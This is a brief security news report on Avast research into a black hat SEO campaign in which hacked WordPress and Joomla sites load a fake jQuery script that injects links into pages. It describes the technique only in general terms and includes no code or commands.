14 DAY TRIAL // Security researchers from Avast have brought to light a new black hat SEO campaign that loads malicious code in the form of a fake jQuery library on hacked WordPress and Joomla sites.
According to Avast's Alexej Savčin, the first step in this campaign is when attackers manage to compromise a website. The researcher doesn't provide an explanation for how this happens but mentions that his company has seen this type of campaign targeting only WordPress and Joomla CMSs, which, if left unpatched, have been known to get hacked quite often in the past.
Once the website gets compromised, the crooks move on to adding malicious JavaScript code to each site's header section.
The crooks only add ten lines of code, which appears to the naked eye to load a version of the jQuery JavaScript library. The catch is that this library is actually in the form of a PHP file (jQuery.min.php) loaded from another previously compromised website.
Fake jQuery script used to inject links inside pages for black hat SEO
When a user accesses one of these compromised websites, this script executes after a ten-millisecond countdown and then injects links inside the page's source code.
These links point to various websites and will help them get a search rankings boost by having other sites linking to them.
Avast says that its telemetry data shows that over 4.5 million users have accessed one of these hacked websites since November 2015, when the infection first came to light. The security firm is also saying that it detected over 70 million of unique malicious files on the hacked servers, showing that the attackers didn't bother masking or limiting their infection only to a few pages (as another recent black hat SEO campaign did).
Webmasters should be able to easily spot this infection if they take the time to look at their site's source code.
